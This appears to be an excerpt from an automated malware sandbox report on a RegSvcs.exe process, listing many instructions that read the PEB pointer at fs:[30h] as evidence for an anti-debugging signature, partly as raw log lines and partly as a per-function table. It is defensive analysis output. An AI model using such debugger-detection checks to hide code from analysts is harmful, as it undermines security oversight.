                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02E1 mov eax, dword ptr fs:[00000030h]7_2_00EC02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02E1 mov eax, dword ptr fs:[00000030h]7_2_00EC02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02E1 mov eax, dword ptr fs:[00000030h]7_2_00EC02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F862D6 mov eax, dword ptr fs:[00000030h]7_2_00F862D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02A0 mov eax, dword ptr fs:[00000030h]7_2_00EC02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02A0 mov eax, dword ptr fs:[00000030h]7_2_00EC02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov ecx, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE284 mov eax, dword ptr fs:[00000030h]7_2_00EEE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE284 mov eax, dword ptr fs:[00000030h]7_2_00EEE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30283 mov eax, dword ptr fs:[00000030h]7_2_00F30283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30283 mov eax, dword ptr fs:[00000030h]7_2_00F30283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30283 mov eax, dword ptr fs:[00000030h]7_2_00F30283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA826B mov eax, dword ptr fs:[00000030h]7_2_00EA826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4260 mov eax, dword ptr fs:[00000030h]7_2_00EB4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4260 mov eax, dword ptr fs:[00000030h]7_2_00EB4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4260 mov eax, dword ptr fs:[00000030h]7_2_00EB4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F8625D mov eax, dword ptr fs:[00000030h]7_2_00F8625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A250 mov eax, dword ptr fs:[00000030h]7_2_00F6A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A250 mov eax, dword ptr fs:[00000030h]7_2_00F6A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F38243 mov eax, dword ptr fs:[00000030h]7_2_00F38243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F38243 mov ecx, dword ptr fs:[00000030h]7_2_00F38243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6259 mov eax, dword ptr fs:[00000030h]7_2_00EB6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA250 mov eax, dword ptr fs:[00000030h]7_2_00EAA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA823B mov eax, dword ptr fs:[00000030h]7_2_00EA823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE63FF mov eax, dword ptr fs:[00000030h]7_2_00EE63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F0 mov eax, dword ptr fs:[00000030h]7_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F0 mov eax, dword ptr fs:[00000030h]7_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F0 mov eax, dword ptr fs:[00000030h]7_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F543D4 mov eax, dword ptr fs:[00000030h]7_2_00F543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F543D4 mov eax, dword ptr fs:[00000030h]7_2_00F543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov eax, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov eax, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov ecx, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov eax, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F363C0 mov eax, dword ptr fs:[00000030h]7_2_00F363C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6C3CD mov eax, dword ptr fs:[00000030h]7_2_00F6C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED438F mov eax, dword ptr fs:[00000030h]7_2_00ED438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED438F mov eax, dword ptr fs:[00000030h]7_2_00ED438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE388 mov eax, dword ptr fs:[00000030h]7_2_00EAE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE388 mov eax, dword ptr fs:[00000030h]7_2_00EAE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE388 mov eax, dword ptr fs:[00000030h]7_2_00EAE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8397 mov eax, dword ptr fs:[00000030h]7_2_00EA8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8397 mov eax, dword ptr fs:[00000030h]7_2_00EA8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8397 mov eax, dword ptr fs:[00000030h]7_2_00EA8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5437C mov eax, dword ptr fs:[00000030h]7_2_00F5437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7A352 mov eax, dword ptr fs:[00000030h]7_2_00F7A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F58350 mov ecx, dword ptr fs:[00000030h]7_2_00F58350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov ecx, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F8634F mov eax, dword ptr fs:[00000030h]7_2_00F8634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov eax, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov ecx, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov eax, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov eax, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA30B mov eax, dword ptr fs:[00000030h]7_2_00EEA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA30B mov eax, dword ptr fs:[00000030h]7_2_00EEA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA30B mov eax, dword ptr fs:[00000030h]7_2_00EEA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC310 mov ecx, dword ptr fs:[00000030h]7_2_00EAC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED0310 mov ecx, dword ptr fs:[00000030h]7_2_00ED0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB04E5 mov ecx, dword ptr fs:[00000030h]7_2_00EB04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB64AB mov eax, dword ptr fs:[00000030h]7_2_00EB64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3A4B0 mov eax, dword ptr fs:[00000030h]7_2_00F3A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE44B0 mov ecx, dword ptr fs:[00000030h]7_2_00EE44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A49A mov eax, dword ptr fs:[00000030h]7_2_00F6A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3C460 mov ecx, dword ptr fs:[00000030h]7_2_00F3C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDA470 mov eax, dword ptr fs:[00000030h]7_2_00EDA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDA470 mov eax, dword ptr fs:[00000030h]7_2_00EDA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDA470 mov eax, dword ptr fs:[00000030h]7_2_00EDA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A456 mov eax, dword ptr fs:[00000030h]7_2_00F6A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA645D mov eax, dword ptr fs:[00000030h]7_2_00EA645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED245A mov eax, dword ptr fs:[00000030h]7_2_00ED245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE420 mov eax, dword ptr fs:[00000030h]7_2_00EAE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE420 mov eax, dword ptr fs:[00000030h]7_2_00EAE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE420 mov eax, dword ptr fs:[00000030h]7_2_00EAE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC427 mov eax, dword ptr fs:[00000030h]7_2_00EAC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8402 mov eax, dword ptr fs:[00000030h]7_2_00EE8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8402 mov eax, dword ptr fs:[00000030h]7_2_00EE8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8402 mov eax, dword ptr fs:[00000030h]7_2_00EE8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC5ED mov eax, dword ptr fs:[00000030h]7_2_00EEC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC5ED mov eax, dword ptr fs:[00000030h]7_2_00EEC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (process 7_2). Every entry below is an instruction of the form mov <reg>, dword ptr fs:[00000030h]. On 32-bit Windows the FS segment maps the TEB and fs:[30h] holds the PEB pointer, so this read is the usual first step of in-process debugger checks such as PEB.BeingDebugged or PEB.NtGlobalFlag; the evidence belongs to the "Checks if the current process is being debugged" signature. "Reads" is the number of such instructions the analysis found inside that code function.

Code function   Register(s)        Reads
7_2_00EDE5E7    eax                8
7_2_00EB25E0    eax                1
7_2_00EEE5CF    eax                2
7_2_00EB65D0    eax                1
7_2_00EEA5D0    eax                2
7_2_00F305A7    eax                3
7_2_00ED45B1    eax                2
7_2_00EE4588    eax                1
7_2_00EB2582    eax (1), ecx (1)   2
7_2_00EEE59C    eax                1
7_2_00EE656A    eax                3
7_2_00EB8550    eax                2
7_2_00EDE53E    eax                5
7_2_00EC0535    eax                6
7_2_00F46500    eax                1
7_2_00F84500    eax                7
7_2_00F2E6F2    eax                4
7_2_00F306F1    eax                2
7_2_00EEA6C7    ebx (1), eax (1)   2
7_2_00EEC6A6    eax                1
7_2_00EE66B0    eax                1
7_2_00EB4690    eax                2
7_2_00EEA660    eax                2
7_2_00F7866E    eax                2
7_2_00EE2674    eax                1
7_2_00ECC640    eax                1
7_2_00EB262C    eax                1
7_2_00ECE627    eax                1
7_2_00EE6620    eax                1
7_2_00EE8620    eax                1
7_2_00EC260B    eax                7
7_2_00EF2619    eax                1
7_2_00ED27ED    eax                3
7_2_00EB47FB    eax                2
7_2_00F3E7E1    eax                1
7_2_00EBC7C0    eax                1
7_2_00F307C3    eax                1
7_2_00EB07AF    eax                1
7_2_00F647A0    eax                1
7_2_00F5678E    eax                1
7_2_00EB8770    eax                1
7_2_00EC0770    eax                12
7_2_00EE674D    esi (1), eax (2)   3
7_2_00F3E75D    eax                1
7_2_00EB0750    eax                1
7_2_00EF2750    eax                2
7_2_00F2C730    eax                1
7_2_00EEC720    eax                2
7_2_00EE273C    eax (2), ecx (1)   3
7_2_00EEC700    eax                1
7_2_00EB0710    eax                1
7_2_00EE0710    eax                1
7_2_00F7A8E4    eax                1
7_2_00EEC8F9    eax                2
7_2_00F808C0    eax                1
7_2_00EB0887    eax                1
7_2_00F3C89D    eax                1
7_2_00F3E872    eax                2
7_2_00F46870    eax                2
7_2_00EB4859    eax                2
7_2_00EE0854    eax                1
7_2_00F5483A    eax                2
7_2_00ED2835    eax (5), ecx (1)   6
7_2_00EEA830    eax                1
7_2_00F3C810    eax                1
7_2_00F3E9E0    eax                1
7_2_00EE29F9    eax                2
7_2_00F7A9D3    eax                1
7_2_00F469C0    eax                1
7_2_00EBA9D0    eax                6
7_2_00EE49D0    eax                1
7_2_00F389B3    esi (1), eax (2)   3
7_2_00EB09AD    eax                2
7_2_00EC29A0    eax                13
7_2_00F54978    eax                2
7_2_00ED6962    eax                3
7_2_00F3C97C    eax                1
7_2_00F30946    eax                1
7_2_00F84940    eax                1
7_2_00F3892A    eax                1
7_2_00F4892B    eax                1
7_2_00F3C912    eax                1
7_2_00EA8918    eax                2
7_2_00F2E908    eax                2
7_2_00EEAAEE    eax                2
7_2_00EB0AD0    eax                1
7_2_00F06ACC    eax                3
7_2_00EE4AD0    eax                2
7_2_00EB8AA0    eax                2
7_2_00EBEA80    eax                9
7_2_00F84A80    eax                1
7_2_00EE8A90    edx                1
7_2_00F2CA72    eax                2
7_2_00EECA6F    eax                3
7_2_00F5EA60    eax                1
7_2_00EC0A5B    eax                2
7_2_00EB6A50    eax                7
7_2_00EDEA2E    eax                1
7_2_00EECA24    eax                1
7_2_00EECA38    eax                1
7_2_00ED4A35    eax                2
7_2_00F3CA11    eax                1
7_2_00F3CBF0    eax                1
7_2_00EB8BF0    eax                3
7_2_00F5EBD0    eax                1
7_2_00EB0BCD    eax                1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0BCD mov eax, dword ptr fs:[00000030h]7_2_00EB0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0BCD mov eax, dword ptr fs:[00000030h]7_2_00EB0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64BB0 mov eax, dword ptr fs:[00000030h]7_2_00F64BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64BB0 mov eax, dword ptr fs:[00000030h]7_2_00F64BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0BBE mov eax, dword ptr fs:[00000030h]7_2_00EC0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0BBE mov eax, dword ptr fs:[00000030h]7_2_00EC0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EACB7E mov eax, dword ptr fs:[00000030h]7_2_00EACB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5EB50 mov eax, dword ptr fs:[00000030h]7_2_00F5EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46B40 mov eax, dword ptr fs:[00000030h]7_2_00F46B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46B40 mov eax, dword ptr fs:[00000030h]7_2_00F46B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F58B42 mov eax, dword ptr fs:[00000030h]7_2_00F58B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7AB40 mov eax, dword ptr fs:[00000030h]7_2_00F7AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8B50 mov eax, dword ptr fs:[00000030h]7_2_00EA8B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64B4B mov eax, dword ptr fs:[00000030h]7_2_00F64B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64B4B mov eax, dword ptr fs:[00000030h]7_2_00F64B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDEB20 mov eax, dword ptr fs:[00000030h]7_2_00EDEB20
